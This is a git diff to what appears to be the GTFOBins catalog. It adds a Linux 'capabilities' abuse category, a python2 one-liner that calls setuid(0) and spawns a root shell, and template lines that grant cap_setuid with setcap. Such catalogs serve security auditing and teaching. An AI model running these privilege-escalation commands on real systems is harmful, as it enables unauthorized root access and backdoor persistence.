diff --git a/_data/functions.yml b/_data/functions.yml
index f9b662f..adc13a1 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -62,6 +62,13 @@ load-library:
     It loads shared libraries that may be used to run code in the binary
     execution context.
 
+capabilities-enabled:
+  label: Capabilities
+  description: |
+    It can manipulate its process UID and in Linux systems it can be set with the
+    `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
+    This also works if the binary is invoked by another binary with the capability set.
+
 suid-enabled:
   label: SUID
   description: |
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index d82049c..5f6e73a 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -30,6 +30,8 @@ functions:
     - code: python2 -c 'open("file_to_read").read()'
   load-library:
     - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+  capabilities-enabled:
+    - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
   suid-enabled:
     - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
   sudo-enabled:
diff --git a/_layouts/bin.html b/_layouts/bin.html
index 47e5e30..19b6039 100644
--- a/_layouts/bin.html
+++ b/_layouts/bin.html
@@ -30,6 +30,10 @@ layout: common
 cp $(which {{ bin_name }}) .
 sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
 {% endif %}
+{%- if function_name == 'capabilities-enabled' %}
+cp $(which {{ bin_name }}) .
+sudo setcap cap_setuid+ep {{ bin_name }}
+{% endif %}
 {{ example.code }}
 {% endcapture %}